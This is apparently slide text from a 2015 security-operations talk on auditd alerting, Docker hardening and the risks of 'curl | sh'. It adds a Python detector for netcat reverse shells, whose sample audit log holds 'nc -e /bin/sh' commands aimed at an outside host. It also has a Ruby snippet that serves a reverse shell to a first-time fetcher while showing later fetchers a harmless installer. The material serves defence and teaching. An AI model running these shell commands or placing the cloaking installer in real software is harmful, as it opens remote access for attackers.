Recovered operations monkey at Puppet Labs. • Owns a lot of black t-shirts. • Had 1300 accounts on his high school Linux system. (:
https://twitter.com/skullmandible/status/411281851131523072
@benjammingh for LasCon 2015
Why am I here. • Things from the real world(™) & how to cope. • Far, far too many summaries. • Wings, moonshine and dancing? (I have no idea)
tiny bugs in Chrome to full sandbox escape. • Egor Homakov's 5 small bugs in GitHub to full private access on GitHub. • XSS to remote code execution in under an hour. • Username & password from HVAC system leads to
Wireshark: 322! CVEs • Security firm Bit9 hacked, used to spread malware • Joxean Koret on breaking antivirus software • Tavis from Project Zero on exploiting ESET • BEST! FireEye just running Apache/PHP as root!
great position for security people who don't want to get paid. • Everyone? Do I have some emails with funny cats for you to click on. • Security vendors? If you have infinite money and no attackers. • Attackers!
• Other: github/gdestuynder/Audisp-json • Have cash, want a decent GUI (and more): go use Threatstack! • Write something yourself in Python & Go: I keep promising to OSS this ):
2. Alert on "/bin/nc *-e /bin/sh*"
3. You will now find out when someone tries to run a reverse shell!
4. Or when your ops people do fun things.
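The alert rule above, worked through as an added example: this is not code from the talk, from auditd or from audisp-json. It reassembles audit EXECVE records (joined to their SYSCALL record by serial so the alert carries uid/auid), applies the slide's glob, and also a broader check, because the literal "/bin/nc *-e /bin/sh*" misses ncat, the -c flag, and arguments auditd hex-encodes when they contain whitespace. The log lines are constructed for the example; hostnames and uids in them are made up.

```python
"""Reassemble auditd EXECVE records and alert on netcat reverse shells.

Added example written for this page; it is not code from the talk, from
auditd or from audisp-json. Log lines are constructed for the example and
follow the standard Linux audit SYSCALL/EXECVE record layout.
"""
import fnmatch
import os
import re

# The glob from the slide: alert when the reassembled command line looks like this.
SLIDE_RULE = "/bin/nc *-e /bin/sh*"

# Constructed sample log. Each execve produces a SYSCALL record and an EXECVE
# record that share the serial after the colon in msg=audit(ts:serial).
# Event 4569 carries a hex-encoded argument: auditd hex-encodes any value that
# contains whitespace or non-printable bytes instead of quoting it.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1444838400.101:4567): arch=c000003e syscall=59 success=yes exit=0 uid=1000 auid=1000 comm="nc" exe="/bin/nc"
type=EXECVE msg=audit(1444838400.101:4567): argc=4 a0="/bin/nc" a1="-e" a2="/bin/sh" a3="root.legit.pw"
type=SYSCALL msg=audit(1444838400.102:4568): arch=c000003e syscall=59 success=yes exit=0 uid=1000 auid=1000 comm="nc" exe="/bin/nc"
type=EXECVE msg=audit(1444838400.102:4568): argc=3 a0="/bin/nc" a1="-zv" a2="10.0.0.5"
type=SYSCALL msg=audit(1444838400.103:4569): arch=c000003e syscall=59 success=yes exit=0 uid=33 auid=4294967295 comm="ncat" exe="/usr/bin/ncat"
type=EXECVE msg=audit(1444838400.103:4569): argc=5 a0="/usr/bin/ncat" a1="-c" a2=2F62696E2F7368202D69 a3="root.legit.pw" a4="2222"
"""

_RECORD_RE = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$")
_FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
_HEX_RE = re.compile(r"[0-9A-Fa-f]+")

NETCATS = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}


def parse_record(line):
    """Split one audit line into type, serial and a dict of raw key=value fields."""
    m = _RECORD_RE.match(line.strip())
    if not m:
        return None
    fields = dict(_FIELD_RE.findall(m.group("body")))
    return {"type": m.group("type"), "serial": int(m.group("serial")), "fields": fields}


def decode_value(raw):
    """Undo audit quoting: "quoted" values are literal, bare hex strings are hex-encoded."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    if _HEX_RE.fullmatch(raw) and len(raw) % 2 == 0:
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    return raw


def execve_argv(fields):
    """Rebuild argv from a0..a(argc-1). (Over-long args split as a0[0], a0[1]... are not handled.)"""
    return [decode_value(fields["a%d" % i]) for i in range(int(fields["argc"]))]


def execve_events(log_text):
    """Yield (serial, argv, syscall_fields), joining each EXECVE to its SYSCALL record by serial."""
    syscalls, execves = {}, {}
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        if rec["type"] == "SYSCALL":
            syscalls[rec["serial"]] = rec["fields"]
        elif rec["type"] == "EXECVE":
            execves[rec["serial"]] = execve_argv(rec["fields"])
    for serial in sorted(execves):
        yield serial, execves[serial], syscalls.get(serial, {})


def matches_slide_rule(argv):
    """The literal rule from the slide, applied to the space-joined command line."""
    return fnmatch.fnmatchcase(" ".join(argv), SLIDE_RULE)


def is_reverse_shell(argv):
    """Broader check: any netcat variant handed a shell via -e/-c/--exec/--sh-exec."""
    if not argv or os.path.basename(argv[0]) not in NETCATS:
        return False
    for i, arg in enumerate(argv[1:], start=1):
        if arg in EXEC_FLAGS:
            prog = argv[i + 1] if i + 1 < len(argv) else ""
        elif arg.startswith(("--exec=", "--sh-exec=")):
            prog = arg.split("=", 1)[1]
        elif arg[:2] in ("-e", "-c") and len(arg) > 2:  # attached form: -e/bin/sh
            prog = arg[2:]
        else:
            continue
        first = prog.split()[0] if prog.split() else ""  # "/bin/sh -i" -> "/bin/sh"
        if os.path.basename(first) in SHELLS:
            return True
    return False


def scan(log_text):
    """Return one alert per execve that trips either rule, with uid/auid from the SYSCALL record."""
    alerts = []
    for serial, argv, sc in execve_events(log_text):
        slide, broad = matches_slide_rule(argv), is_reverse_shell(argv)
        if slide or broad:
            alerts.append({"serial": serial, "uid": sc.get("uid"), "auid": sc.get("auid"),
                           "cmdline": " ".join(argv), "slide_rule": slide, "broad_rule": broad})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_AUDIT_LOG):
        print(alert)
```

Run against the sample: event 4567 trips both rules, 4568 (a plain port scan) trips neither, and 4569 trips only the broader check, which is the point of not stopping at the slide's one-line glob. Pointing this at a real /var/log/audit/audit.log needs the execve rule in audit.rules ("-a exit,always -F arch=b64 -S execve") and, as slide 4 warns, a whitelist for the ops people who legitimately do fun things.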
# The talk's deliberately malicious "curl | sh" installer: the first fetch from an IP
# (the one the piped shell executes, unseen) gets a reverse shell; every later fetch
# (the one a suspicious user makes to read the source) gets the legitimate script.
# The method name install_script_for and the global $seen_before are assumed here;
# print_install_code stands in for the real install script, which the slide does not show.
$seen_before = []

def print_install_code
  "#!/bin/sh\necho installing...\n"
end

def install_script_for(ip)
  if $seen_before.include? ip
    return print_install_code()
  else
    $seen_before << ip
    return 'nc -e /bin/sh root.legit.pw 2222 &'
  end
end
cost ~$6. • If I can't make $6 by owning a system, I should probably stop being an attacker. • @letsencrypt will soon make this free.
root. • No really, stop running things as root. • Did I mention not running things as root. • It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as.)
all and --cap-add <thing> to get down to the minimum capabilities. • Use Docker Notary • Use grsecurity (just do that anyway, if you can.) • Use SELinux... I may as well ask for a pony here.
Docker is ZOMG unhackable. • It's just cgroups and namespacing. (just) • Escapes will happen. • They have a rad security team (Hi @diogomonica and @nathanmccauley)
is secure, enough. • Network separation & segregation still works. • Secrets/credentials are still a bigger problem. • PLEASE don't just adopt it because it's new & shiny. • unikernels
security problems. (see OAuth) • Annual pen-tests don't scale; bug bounties can help. • Attackers are mining any public info you have (GitHub, S3, pastebin?) • No really, go check all your S3 buckets...
you to stop trusting curl. • Auditd is awful, but it can be less awful. • Jenkins, you probably have to have one. • But that can be okay, nay, even useful for security.
Docker and security can be used in the same sentence. • Understand your threat model (Apple's guide) • Don't be a FireEye, stop running things as root.